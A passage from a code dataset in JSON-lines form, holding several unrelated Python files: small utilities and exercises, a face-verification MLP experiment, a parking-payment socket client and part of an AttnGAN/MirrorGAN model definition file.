coef_h))\n\n\nhouses.write(\"Index,Hogwarts House\\n\")\n\nfor i, line in enumerate(features):\n\tguess = get_coef(line, coef_g, coef_r, coef_s, coef_h)\n\thouses.write(str(i) + \",\" + guess + \"\\n\")\n\n\n\n","sub_path":"logreg_predict.py","file_name":"logreg_predict.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"165062688","text":"def toStr(n, base):\r\n # base is the radix of the numeral system we want to convert n into\r\n # n is the number we want to convert\r\n\r\n convert = '0123456789abcdef'\r\n if n < base:\r\n return convert[n]\r\n else:\r\n return toStr(n//base, base) + 
convert[n%base]\r\n\r\nprint(toStr(3,2))","sub_path":"recursion/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"66091197","text":"from lib.scrapy_table import Scrapy_Table\n\nurl_municipios=\"https://pt.wikipedia.org/wiki/Lista_de_munic%C3%ADpios_do_Brasil_por_popula%C3%A7%C3%A3o\"\n\nsite_connect_municipio = Scrapy_Table(url_municipios)\n\nmunicipios_table = site_connect_municipio.get_tables(0)\n\nprint('exercise 2')\n\nfor municipio in municipios_table[1:]:\n if int(municipio[4]) < 70000:\n # printing without the encode was raising a conversion error\n print(municipio[2].encode('utf8'))\n","sub_path":"modulo1/exercicios/MyCode/exercicios.2.py","file_name":"exercicios.2.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"94535796","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n'''\r\n@File : convertHelper.py\r\n@Date : 2020/11/16\r\n@Author : Yaronzz\r\n@Version : 1.0\r\n@Contact : yaronhuang@foxmail.com\r\n@Desc : \r\n'''\r\n\r\nfrom enum import Enum\r\n\r\n\r\nclass MemoryUnit(Enum):\r\n GB = 0\r\n MB = 1\r\n KB = 2\r\n BYTE = 3\r\n\r\n\r\ndef convertMemoryUnit(num: float, srcUnit: MemoryUnit, desUnit: MemoryUnit) -> float:\r\n \"\"\"Convert memory unit, support gb/mb/kb/byte\r\n\r\n Args:\r\n num (float): value\r\n srcUnit (MemoryUnit): Original unit\r\n desUnit (MemoryUnit): Target unit\r\n \"\"\"\r\n if srcUnit == desUnit:\r\n return num\r\n\r\n try:\r\n num = float(num)\r\n if num == 0:\r\n return 0\r\n srcIndex = srcUnit.value\r\n desIndex = desUnit.value\r\n diff = abs(srcIndex - desIndex)\r\n\r\n while diff != 0:\r\n if srcIndex < desIndex:\r\n num = num * 1024\r\n else:\r\n num = num / 1024\r\n diff -= 1\r\n\r\n return num\r\n except ValueError:\r\n return 0\r\n\r\n\r\ndef convertMemoryUnitAuto(num: float, unit: MemoryUnit, maxUnit: MemoryUnit) -> (float, MemoryUnit):\r\n \"\"\"Automatic conversion to appropriate units\r\n\r\n Args:\r\n num (float): value\r\n unit (MemoryUnit): Original unit\r\n\r\n Returns:\r\n [float, MemoryUnit]: target value and unit\r\n \"\"\"\r\n try:\r\n num = float(num)\r\n if num == 0:\r\n return 0, unit\r\n\r\n index = unit.value\r\n while index > maxUnit.value:\r\n newNum = num / 1024\r\n if newNum < 1:\r\n break\r\n num = newNum\r\n index -= 1\r\n\r\n return num, MemoryUnit(index)\r\n except ValueError:\r\n return 0, MemoryUnit.BYTE\r\n\r\n\r\ndef getMemoryUnitString(num: float, unit: MemoryUnit) -> str:\r\n \"\"\"Convert the unit to string, eg: num(2653)unit(MB) -> '2.59 GB'\r\n\r\n Args:\r\n num (float): value\r\n unit (MemoryUnit): Original unit\r\n\r\n Returns:\r\n [string]: target string, keep two decimal places\r\n \"\"\"\r\n value, newUnit = convertMemoryUnitAuto(num, unit, MemoryUnit.GB)\r\n string = str(round(value, 2)) + ' ' + newUnit.name\r\n return string\r\n","sub_path":"aigpy/convertHelper.py","file_name":"convertHelper.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"126836256","text":"from __future__ import print_function\nimport matplotlib.pyplot as plt\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.datasets import fetch_lfw_people\nfrom sklearn.metrics import accuracy_score, log_loss\nfrom classifiers import *\nfrom model import *\nfrom config import *\nimport numpy as 
np\nfrom preprocessor import Preprocessor\nfrom sklearn.preprocessing import StandardScaler\nfrom time import time\n\nDELTA_ERROR = 0.01\n\ndef has_converged(y):\n return abs(y[-1] - y[-2]) <= DELTA_ERROR and abs(y[-2] - y[-3]) <= DELTA_ERROR\n\n\ndef test_case(param, values, n_classes, x_train, y_train, x_test, y_test, data_name, other_args={}):\n y1 = []\n y2 = []\n losses = []\n accuracies = []\n times = []\n best_acc = 0\n best_val = None\n\n try:\n for val in values:\n accuracy, loss, time = test_single_var(param, val, n_classes, x_train, y_train, x_test, y_test, other_args)\n print(\"Param: %s, value: %s, accuracy: %s, loss: %s\" % (param, val, accuracy, loss))\n accuracies.append(accuracy)\n losses.append(loss)\n times.append(time)\n if accuracy > best_acc:\n best_val = val\n best_acc = accuracy\n y1.append(accuracy)\n y2.append(loss)\n except KeyboardInterrupt:\n pass\n\n x = np.array(range(len(y1)))\n\n stats = {'n_samples' : x_train.shape[0],\n 'n_classes' : n_classes,\n 'n_test' : x_test.shape[0],\n 'param' : param,\n 'values' : values,\n 'accuracies' : accuracies,\n 'losses' : losses,\n 'train_times' : times,\n 'best_acc' : best_acc,\n 'best_val' : best_val,\n 'other_args' : other_args}\n\n save_test_stats(stats, data_name)\n max_y2 = float(max(y2))\n y2 = list(map(lambda x: x/max_y2, y2))\n save_graph(x, y1, y2, param, values, data_name)\n print(\"Best %s: %s\\nAccuracy %s\" % (param, best_val, best_acc))\n\n\ndef test_no_match(x_train, y_train, x_test, param, values, data_name, other_args = {}):\n accs = []\n best_acc = 0\n best_val = None\n for val in values:\n all_args = {param: val}\n all_args.update(other_args)\n acc = _test_no_match(x_train, y_train, x_test, all_args)\n print(\"Param: %s, value: %s, accuracy: %s\" % (param, val, acc))\n accs.append(acc)\n if acc > best_acc:\n best_acc = acc\n best_val = val\n\n y1 = np.array(accs)\n x = np.array(range(len(y1)))\n y2 = [1-a for a in accs]\n print(\"Best %s: %s\\nAccuracy %s\" % (param, best_val, best_acc))\n save_graph(x, y1, y2, param, values, data_name)\n\n\ndef _test_no_match(x_train, y_train, x_test, args):\n mlp = train_model(x_train, y_train, args)\n ids = [verify_img(mlp,x) for x in x_test]\n correct = ids.count(\"NO_MATCH\")\n accuracy = correct/float(len(ids))\n return accuracy\n\n\ndef save_graph(x, y1, y2, param, values, data_name):\n xTicks = 
def save_graph(x, y1, y2, param, values, data_name):\n    xTicks = [str(values[i]) for i in range(len(x))]\n    fig, ax = plt.subplots()\n    plt.xticks(x, xTicks)\n    line1, = ax.plot(x, y1, '-', label='Accuracy')\n    line2, = ax.plot(x, y2, '-', label='Loss')\n    ax.legend(loc = 'lower right')\n    ax.set_xlabel(param)\n    fig.autofmt_xdate(rotation=80)\n    #plt.show()\n    plt.savefig(\"data/graphs/\" + \"%s.png\" % (data_name))\n\n\ndef test_single_var(test_arg, value, n_classes, x_train, y_train, x_test, y_test, other_args = {}):\n    all_args = {test_arg : value}\n    all_args.update(other_args)\n    mlp = MLPClassifier(**all_args)\n    t0 = time()\n    mlp.fit(x_train, y_train)\n    train_time = (time() - t0)\n    y_pred = mlp.predict(x_test)\n    y_proba = mlp.predict_proba(x_test)\n    accuracy = accuracy_score(y_test, y_pred)\n    loss = log_loss(y_test, y_proba, labels=[i for i in range(n_classes)])\n    return accuracy, loss, train_time\n\n\ndef save_test_stats(stats, data_name):\n    with open(\"./data/stats/\" + \"%s\" % data_name, 'a') as f:\n        print(\"##TESTCASE##\", file=f)\n        for k,v in stats.items():\n            print(\"%s: %s\" % (k,v), file=f)\n\n\ndef train_model(x_train, y_train, args):\n    mlp = MLPClassifier(**args)\n    mlp.fit(x_train, y_train)\n    return mlp\n\n\ndef verify_img(clf, img, label=None, target_names=None):\n    # reshape to a single sample to avoid sklearn's shape warnings\n    img = img.reshape(1, -1)\n    y_prob = clf.predict_proba(img)\n    y_pred = clf.predict(img)\n    if label and target_names:\n        print(\"Predicted: %s\\n Confidence: %s\\n Actually: %s\" % (target_names[y_pred], y_prob[0][y_pred], label))\n    if y_prob.max() > 0.85:\n        return \"MATCH\"\n    else:\n        return \"NO_MATCH\"\n\n\np = Preprocessor()\nX_train, X_test, y_train, y_test, target_names = p.get_data()\nprint(\"LOADED DATA\")\nn_classes = target_names.shape[0]\n\npca = PCA(n_components=PCA_N_COMPONENTS, whiten=True, svd_solver='randomized').fit(X_train)\nn_components = min(PCA_N_COMPONENTS, pca.components_.shape[0])\neigenfaces = pca.components_.reshape((n_components, processed_height, processed_width))\nx_train = pca.transform(X_train)\nx_test = pca.transform(X_test)\nscaler = StandardScaler()\nscaler.fit(x_train)\nx_train = scaler.transform(x_train)\nx_test = scaler.transform(x_test)\n\n## This is grabbing img/target_label_name for single person\nnew_person_imgs, target_labels = p.load_test_data(\"data/Nikola\")\nnp_imgs = pca.transform(new_person_imgs)\nnp_imgs = scaler.transform(np_imgs)\n\n#test_no_match(x_train, y_train, np_imgs, \"hidden_layer_sizes\", [(20,i) for i in range (1,30,2)], \"small_(20,1-30)\", {'alpha':1.1, 'beta_1':0.9, 'learning_rate':'constant', 'max_iter':3000, 'batch_size': 80})\n#test_no_match(x_train, y_train, np_imgs, \"hidden_layer_sizes\", [(i,2) for i in range (3,60,4)], \"small_(3-60,2)\", {'alpha':1.1, 'beta_1':0.9, 'learning_rate':'constant', 'max_iter':3000, 'batch_size': 80}) #(7,2), (11,2), (47,2) all 100%\ntest_no_match(x_train, y_train, np_imgs, \"hidden_layer_sizes\", [(i,1) for i in range (1,30)], \"small_(1-30,1)\", {'alpha':1.1, 'beta_1':0.9, 'learning_rate':'constant', 'max_iter':3000, 'batch_size': 80})\n\n\n# Drop into an ipython session to experiment\n#from IPython import embed\n#embed()\n\n#just to keep template for quick test.. 
dont be upset\n#test_case(\"hidden_layer_sizes\", [(20,i) for i in range(3,200,5)], n_classes, x_train, y_train, x_test, y_test, \"hi_iter_batch_(20,3-200)\", other_args = {'alpha': 1.1, 'beta_1': 0.9, 'learning_rate': 'constant', 'max_iter' : 3000, 'batch_size' : 3000})\n","sub_path":"src/data_collect.py","file_name":"data_collect.py","file_ext":"py","file_size_in_byte":8057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"297909271","text":"import unittest\nimport temperature_utils\n\n\nclass TemperatureUtilsTest(unittest.TestCase):\n\n def test_convert_to_celsius(self):\n test_cases = [\n (32, 0),\n (68, 20),\n (100, 37.78),\n (104, 40)\n ]\n for temp_in, expected in test_cases:\n with self.subTest(f\"{temp_in} -> {expected}\"):\n self.assertEqual(expected, temperature_utils.convert_to_celsius(temp_in))\n\n def test_convert_to_fahrenheit(self):\n test_cases = [\n (-17.7778, 0),\n (0, 32),\n (100, 212)\n ]\n for temp_in, expected in test_cases:\n with self.subTest(f\"{temp_in} -> {expected}\"):\n self.assertEqual(expected, temperature_utils.convert_to_fahrenheit(temp_in))\n\n def test_temperature_tuple(self):\n temps_input = (32, 68, 100, 104)\n expected = ((32, 0.0), (68, 20.0), (100, 37.78), (104, 40.0))\n actual = temperature_utils.temperature_tuple(temps_input, \"f\")\n self.assertEqual(expected, actual)\n\n def test2_temperature_tuple(self):\n temps_input = (-17.7778, 0, 100)\n expected = ((-17.7778, 0.0), (0, 32.0), (100, 212.0))\n actual = temperature_utils.temperature_tuple(temps_input, \"c\")\n self.assertEqual(expected, actual)\n\n def test3_temperature_tuple(self):\n temps_input = (1, 2, 3)\n self.assertEqual(tuple(), temperature_utils.temperature_tuple(temps_input, \"a\"))\n","sub_path":"part6/test_temperature_utils.py","file_name":"test_temperature_utils.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"23361226","text":"import matplotlib.pyplot as plt\nfrom string import ascii_uppercase\n\ndef countSpecific(_path, _letter):\n _letter = _letter.strip().upper()\n file = open(_path, 'rb')\n text = str(file.read())\n return text.count(_letter) + text.count(_letter.lower())\n\ndef countAll(_path):\n file = open(_path, \"rb\")\n text = str(file.read())\n letters = dict.fromkeys(ascii_uppercase, 0)\n for char in text:\n if char.isalpha():\n letters[char.upper()]+=1\n\n return letters\n\npath = input(\"What file would you like to use? 
(text.txt) \")\nD = countAll(\"src\\\\Other\\\\\" + path)\n# D = D | countAll(\"src\\\\Other\\\\\" + path)\n# S = {k: v for k, v in sorted(D.items(), key=lambda item: item[1])}\nprint(D)\nplt.bar(range(len(D)), list(D.values()), align='center')\nplt.xticks(range(len(D)), list(D.keys()))\n\n\nplt.show()","sub_path":"src/Other/LetterFrequency.py","file_name":"LetterFrequency.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"472993191","text":"import requests\nimport json,os,sys,time\nfrom datetime import datetime\nfrom Pila.Pila import Pila\n\n\nfrom urllib.request import urlopen\n\n\n\nruta = os.path.join(os.path.dirname(os.path.abspath(__file__)))\nruta = ruta + \"/\"\ndef obtenerUsuario(ruta):\n\tlista = ruta.split(\"/\")\n\treturn \"/\"+lista[1]+\"/\"+lista[2]+\"/\"\t\nrutaUsuario = obtenerUsuario(ruta)\nprint(rutaUsuario)\n\n\n\nraiz = os.path.join(os.path.dirname(os.path.abspath(__file__)),\"..\")\nsys.path.append(raiz)\n\nimport Conexiones.cliente as Servidor\n\nclass Conexiones:\n\t\"\"\"Class used to store the data when\n\ta connection attempt fails\n\t\"\"\"\n\n\tdef __init__(self):\n\t\tself.items = []\n\t\tself.cola = Pila()  # pending-payment queue, used by encolarPago below\n\t\tself.obtenerConfiguracion()\n\n\tdef activo(self):\n\t\tconexionServ=1\n\t\ttry:\n\t\t\tconexionServ=os.system(\"sudo ping -c 1 192.168.1.129\")\n\t\t\tif conexionServ:\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\treturn True\n\t\texcept: \n\t\t\treturn conexionServ\n\t\n\tdef obtenerConfiguracion(self):\n\t\t#global equipo, sucursal, tipo\n\t\ttry:\n\t\t\tinfile = open(rutaUsuario+\"eum.conf\", 'r')\n\t\t\tc=infile.readline()\n\t\t\tarr=c.split(',')\n\t\t\tself.__equipo=int(arr[0])\n\t\t\tself.__sucursal=int(arr[1])\n\t\t\tself.__tipo=int(arr[2])\n\t\t\tinfile.close()\n\t\texcept:\n\t\t\tself.__equipo=1\n\t\t\tself.__sucursal=1\n\t\t\tself.__tipo=0\n\t\t\tinfile = open(rutaUsuario+\"eum.conf\", \"w\")\n\t\t\tinfile.write(str(self.__equipo)+\",\"+str(self.__sucursal)+\",\"+str(self.__tipo))\n\t\t\tinfile.close()\n\t\tprint(\"equipo,sucursal,tipo \",self.__equipo,self.__sucursal,self.__tipo)\n\n\t
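# Note: eum.conf is expected to hold a single line \"equipo,sucursal,tipo\"\n\t# (e.g. \"1,1,0\"); when it is missing or malformed, obtenerConfiguracion()\n\t# above recreates it with those defaults.\n\n\t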
def servidorActivo(self):\n\t\ttimestamp=datetime.now()\t\t\n\t\tmensaje=str(\"2\")+\",\"+str(\"0\")+\",\"+str(21)\n\t\tresultado=Servidor.configSocket(\"log\", mensaje)\n\t\tif(resultado==-1):\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\n\tdef pollConexion(self,tipo):\n\t\ttimestamp=datetime.now()\t\n\t\tprint(\"equipo.......\",self.__equipo,self.__tipo)\t\n\t\tmensaje=str(\"2\")+\",\"+str(tipo)+\",\"+str(self.__tipo)+str(self.__equipo)\n\t\tresultado=Servidor.configSocket(\"log\", mensaje)\n\t\tif(resultado==-1):\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\tdef logPrendido(self):\n\t\tmensaje=str(\"2\")+\",\"+str(\"1\")+\",\"+str(self.__tipo)+str(self.__equipo)\n\t\tresultado=Servidor.configSocket(\"log\", mensaje)\n\t\tif(resultado==-1):\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\tdef obtenerLogs(self):\n\t\tmensaje=str(\"2\")+\",\"+str(\"4\")+\",\"+str(21)\n\t\tlogs=Servidor.configSocket(\"log\", mensaje)\n\t\tif(logs==-1):\n\t\t\treturn False\n\t\telse:\n\t\t\tlogsResult = []\n\t\t\tlogs = str(logs.decode('utf-8'))\n\t\t\ttmp = len(logs)\n\t\t\tlogs = logs[:tmp -1]\n\t\t\tlogs = logs.replace(\"[\",\" \") \n\t\t\tlogs = logs.split(\",\")\n\t    #logs = logs[3]\n\t    #logs = logs.split(',')\n\t    #for log in logs:\n\t    #    print(\"Nodo: \"+str(log[3])+\" \"+\"Fecha:\"+str(log[1]))\n\t\t\tfor log in logs:\n\t\t\t\ttmp = len(log)\n\t\t\t\tlog = log[2:tmp -1]\n\t\t\t\tlogsResult.append(log)\n\t\t\treturn logsResult\n\t\t\t\n\t\t\t\n\tdef buscarTicket(self,mensaje):\n\t\ttry:\n\t\t\tresultado=Servidor.configSocket(\"informacion boleto\", mensaje)\n\t\t\tif(resultado == \"boleto no localizado\"):\n\t\t\t\tprint(\"Registering unlocated ticket...\")\n\t\t\telse:\n\t\t\t\tprint(\"ticket not located, waiting for its registration...\")\n\t\t\treturn resultado\n\t\texcept:\n\t\t\tprint(\"Error while searching for the ticket\")\n\t\t\treturn -1\n\t\t\t\n\t\t\t\n\tdef registrarPago(self,mensaje):\n\t\ttry:\n\t\t\tresultado=Servidor.configSocket(\"pago boleto\", mensaje)\n\t\t\tif(resultado == \"boleto no localizado\"):\n\t\t\t\tprint(\"Registering unlocated ticket...\")\n\t\t\telse:\n\t\t\t\tprint(\"ticket not located, waiting for its registration...\")\n\t\t\treturn resultado\n\t\texcept:\n\t\t\tprint(\"Error while registering the payment\")\n\t\t\treturn -1\n\t\t\t\n\tdef encolarPago(self,mensaje):\n\t\ttry:\n\t\t\tprint(self.cola.estaVacia())\n\t\texcept:\n\t\t\tprint(\"Error while queueing the payment\")\n\t\t\treturn -1\n\n\n\tdef estaVacia(self):\n\t\treturn self.items == []\n\n\tdef incluir(self, item):\n\t\tself.items.append(item)\n\n\tdef extraer(self):\n\t\treturn self.items.pop()\n\n\tdef inspeccionar(self):\n\t\treturn self.items[len(self.items)-1]\n\n\tdef tamano(self):\n\t\treturn len(self.items)\n","sub_path":"app/Conexiones/Conexiones.py","file_name":"Conexiones.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"307290059","text":"#!python3\r\n#stopwatch.py - A simple stopwatch application\r\nimport time\r\n\r\n\r\nprint('Press ENTER to begin. Then press ENTER to \"click\" the stopwatch. Press Ctrl-C to quit.')\r\ninput()\r\nprint('Started')\r\nstart=time.time()\r\nlasttime=start\r\nlapNum=1\r\ntry:\r\n\twhile 1:\r\n\t\tinput()\r\n\t\tlapTime=round(time.time()-lasttime,2)\r\n\t\ttotal=round(time.time()-start,2)\r\n\t\tprint('Lap #%s:%s (%s)' 
%(lapNum,str(total).rjust(5),str(lapTime).rjust(5)))\n\t\tlapNum+=1\n\t\tlasttime=time.time()\nexcept KeyboardInterrupt:\n\t#Handling Ctrl-C exception\n\tprint('\\nDone')\n","sub_path":"chap15/stopwatch.py","file_name":"stopwatch.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"246104877","text":"# File: models.py\n# ---------------\n# File containing definitions for all models and architectures\n# used by AttnGAN and MirrorGAN. The implementations of the\n# models were influenced by https://github.com/taoxugit/AttnGAN.\n\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import models\nimport torch.utils.model_zoo as model_zoo\nimport torch.nn.functional as F\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nimport os\n\nimport constants\n\n# General utility functions for dealing with models\ndef initialize_models(args):\n '''\n Initialize the models required for the particular experiment\n '''\n # Initialize the DAMSM components\n if args.pretrain and not args.mirrorgan:\n return initialize_damsm_models(args)\n elif args.pretrain and args.mirrorgan:\n return initialize_caption_models(args)\n elif not args.mirrorgan:\n return initialize_attngan_models(args)\n else:\n return initialize_mirrorgan_models(args)\n\ndef initialize_damsm_models(args):\n '''\n Initializes the models for DAMSM.\n '''\n # Initialize the DAMSM components\n text_encoder = load_model(args, args.model_path, TextEncoder, 'damsm')\n image_encoder = load_model(args, args.model_path, ImageEncoder, 'damsm')\n return text_encoder, image_encoder\n\ndef initialize_caption_models(args):\n '''\n Initializes the models for STREAM.\n '''\n image_encoder = load_model(args, args.model_path, ImageCaptioningImageEncoder,\n \"caption\")\n captioner = load_model(args, args.model_path, ImageCaptioningLSTM,\n \"caption\")\n return image_encoder, captioner\n\ndef initialize_attngan_models(args):\n '''\n Initializes the models for AttnGAN.\n '''\n # Initialize the DAMSM components\n text_encoder = load_model(args, args.damsm_path, TextEncoder, 'damsm')\n image_encoder = load_model(args, args.damsm_path, ImageEncoder, 'damsm')\n turn_off_requires_grad([text_encoder, image_encoder])\n\n # Initialize the generators and discriminators\n generator_complex = load_model(args, args.model_path, GeneratorComplex, 'main')\n discriminators = []\n for i in range(3):\n discriminators.append(load_model(args, args.model_path, Discriminator, 'main', i))\n return text_encoder, image_encoder, generator_complex, discriminators \n\ndef initialize_mirrorgan_models(args):\n '''\n Initialize the models for MirrorGAN\n '''\n # Initialize the pretrained components\n text_encoder = load_model(args, args.damsm_path, TextEncoder, 'damsm')\n image_encoder = load_model(args, args.caption_path, ImageCaptioningImageEncoder,\n 'caption')\n captioner = load_model(args, args.caption_path, ImageCaptioningLSTM,\n 'caption')\n turn_off_requires_grad([text_encoder, image_encoder, captioner])\n specific_component = [image_encoder, captioner]\n\n # Initialize the generators and discriminators\n generator_complex = load_model(args, args.model_path, GeneratorComplex, 'main')\n discriminators = []\n for i in range(3):\n discriminators.append(load_model(args, args.model_path, Discriminator, 'main', i))\n return text_encoder, specific_component, generator_complex, discriminators\n\ndef initialize_inception_network(args):\n '''\n 
Initializes the inception network for the calculation of inception scores\n '''\n model = InceptionNetwork().to(args.device)\n epoch = args.inception_load_epoch\n \n if epoch != -1:\n extension = \"{}_model_epoch={}.pth\".format(model.name, epoch)\n path = os.path.join(args.inception_model_path, extension)\n model.load_state_dict(torch.load(path))\n\n return model\n\ndef turn_off_requires_grad(models):\n '''\n Sets requires grad to false for the input models\n '''\n for model in models:\n for param in model.parameters():\n param.requires_grad = False\n\ndef load_model(args, model_dir, model_class, method_section, disc_num=-1):\n # Load the model\n if disc_num == -1:\n model = model_class(args).to(args.device)\n else:\n model = model_class(args, disc_num).to(args.device)\n\n # Decide whether to load from previous epochs\n epoch = get_epoch(args, method_section)\n\n if epoch == -1 and method_section == 'main':\n model.apply(weight_init)\n elif epoch != -1:\n extension = \"{}_model_epoch={}.pth\".format(model.name, epoch)\n path = os.path.join(model_dir, extension)\n model.load_state_dict(torch.load(path))\n\n return model\n\ndef get_epoch(args, method_section):\n if method_section == \"main\":\n return args.load_epoch\n elif method_section == \"damsm\":\n return args.damsm_load_epoch\n else:\n return args.caption_load_epoch\n\ndef weight_init(m):\n if isinstance(m, nn.Linear) or isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight.data)\n nn.init.constant_(m.bias.data, 0) # May be problematic\n \ndef get_damsm_params(args, model):\n '''\n Gets the parameters to be used for DAMSM optimization\n '''\n # Get the DAMSM optimizer\n text_encoder, image_encoder = model\n parameters = list(text_encoder.parameters())\n for param in image_encoder.parameters():\n if param.requires_grad:\n parameters.append(param)\n return parameters\n\ndef get_caption_params(args, model):\n '''\n Gets the parameters to be used for STREAM optimization\n '''\n image_encoder, captioner = model\n parameters = list(captioner.parameters()) + list(image_encoder.projection.parameters())\n return parameters\n\ndef initialize_damsm_optimizer(args, model):\n '''\n Initializes the optimizers for training damsm module\n '''\n # Get the DAMSM optimizer\n text_encoder, image_encoder = model\n parameters = list(text_encoder.parameters())\n for param in image_encoder.parameters():\n if param.requires_grad:\n parameters.append(param)\n optimizer = optim.Adam(parameters, lr=args.damsm_lr, betas=(0.5, 0.999))\n\n # Load from checkpoint if specified\n if args.damsm_load_epoch != -1:\n extension = \"damsm_optim_epoch={}.pth\".format(args.damsm_load_epoch)\n path = os.path.join(args.model_path, extension)\n optimizer.load_state_dict(torch.load(path))\n\n return optimizer\n\ndef initialize_main_optimizer(args, model):\n '''\n Initializes the optimizers for training the main modules.\n '''\n # Get the optimizers themselves\n _, _, generator, discriminators = model\n generator_optimizer = load_main_optim(args, generator, args.gen_lr)\n discriminator_optimizers = []\n for discriminator in discriminators:\n discriminator_optimizers.append(load_main_optim(args, discriminator,\n args.disc_lr))\n return generator_optimizer, discriminator_optimizers\n\ndef load_main_optim(args, model, lr):\n '''\n Initializes and potentially loads from checkpoints an optimizer\n '''\n # Initialize optimizer\n optimizer = optim.Adam(model.parameters(), lr=lr, betas=(0.5, 0.999))\n\n # Load from checkpoint if needed\n if args.load_epoch != -1:\n extension = 
\"{}_optim_epoch={}.pth\".format(model.name, args.load_epoch)\n        path = os.path.join(args.model_path, extension)\n        optimizer.load_state_dict(torch.load(path))\n\n    return optimizer\n\ndef save_model(args, model, epoch):\n    '''\n    Saves a model to the folder specified in args\n    '''\n    extension = \"{}_model_epoch={}.pth\".format(model.name, epoch)\n    path = os.path.join(args.model_path, extension)\n    torch.save(model.state_dict(), path)\n\ndef save_optimizer(args, model, optimizer, epoch):\n    '''\n    Saves an optimizer's state to the folder specified in args\n    '''\n    extension = \"{}_optim_epoch={}.pth\".format(model.name, epoch)\n    path = os.path.join(args.model_path, extension)\n    torch.save(optimizer.state_dict(), path)\n\n\ndef save_main_state(args, model, optimizers, epoch):\n    '''\n    Saves the current state of the main module\n    '''\n    _, _, generator, discs = model\n    gen_opt, disc_opts = optimizers\n\n    save_model(args, generator, epoch)\n    save_optimizer(args, generator, gen_opt, epoch)\n    for index, disc in enumerate(discs):\n        save_model(args, disc, epoch)\n        save_optimizer(args, disc, disc_opts[index], epoch)\n\ndef save_damsm_state(args, model, epoch):\n    '''\n    Saves the current state of the DAMSM modules\n    '''\n    text_encoder, image_encoder = model\n\n    # Save the models\n    save_model(args, text_encoder, epoch)\n    save_model(args, image_encoder, epoch)\n\ndef save_caption_state(args, model, epoch):\n    '''\n    Saves the current state of the STREAM module\n    '''\n    image_encoder, captioner = model\n\n    # Save the models\n    save_model(args, image_encoder, epoch)\n    save_model(args, captioner, epoch)\n\n# Utility functions for recurring blocks\ndef conv1x1(in_channels, num_filter, bias=True):\n    '''\n    Simple 1x1 convolution layer\n    '''\n    return nn.Conv2d(in_channels, num_filter, 1, bias=bias)\n\ndef conv3x3(in_channels, num_filter, bias=True):\n    '''\n    Simple 3x3 convolution layer that preserves dimensions\n    (H, W).\n    '''\n    return nn.Conv2d(in_channels, num_filter, 3, padding=1,\n                     bias=bias)\n\nclass GLU(nn.Module):\n    def __init__(self):\n        super(GLU, self).__init__()\n\n    def forward(self, x):\n        nc = int(x.shape[1] / 2)\n        return x[:, :nc] * torch.sigmoid(x[:, nc:]) \n\ndef upBlock(in_channels, num_filter):\n    '''\n    Upscales the input tensor by a factor of two and then\n    applies a 3x3 dimension preserving convolutional layer\n    '''\n    return nn.Sequential(\n        nn.Upsample(scale_factor=2, mode='nearest'),\n        conv3x3(in_channels, num_filter * 2),\n        nn.BatchNorm2d(num_filter * 2),\n        GLU())\n\ndef leakyReLUBlock(in_channels, num_filter, kernel_size=3, \n                   stride=1, padding=1, bias=True):\n    return nn.Sequential(\n        nn.Conv2d(in_channels, num_filter, kernel_size,\n                  stride=stride, padding=padding, bias=bias),\n        nn.BatchNorm2d(num_filter),\n        nn.LeakyReLU(0.2, inplace=True))\n\nclass ResidualBlock(nn.Module):\n    '''\n    Implementation of the residual blocks to be used in the\n    deeper generator modules.\n    '''\n    \n    def __init__(self, in_channels):\n        super(ResidualBlock, self).__init__()\n        \n        self.res_block = nn.Sequential(\n            conv3x3(in_channels, in_channels * 2),\n            nn.BatchNorm2d(in_channels * 2),\n            GLU(),\n            conv3x3(in_channels, in_channels),\n            nn.BatchNorm2d(in_channels))\n\n    def forward(self, x):\n        return x + self.res_block(x)\n\nclass MyDataParallel(nn.DataParallel):\n    def __getattr__(self, name):\n        # Fall back to the wrapped module for attributes DataParallel lacks;\n        # trying the parent first avoids infinite recursion on 'module' itself.\n        try:\n            return super(MyDataParallel, self).__getattr__(name)\n        except AttributeError:\n            return getattr(self.module, name)\n\n# Model architectures\n\n# DAMSM Components: The Text and Image Encoders\nclass TextEncoder(nn.Module):\n    '''\n    The text encoder used in order to extract sentence encodings\n    and word encodings from a caption. 
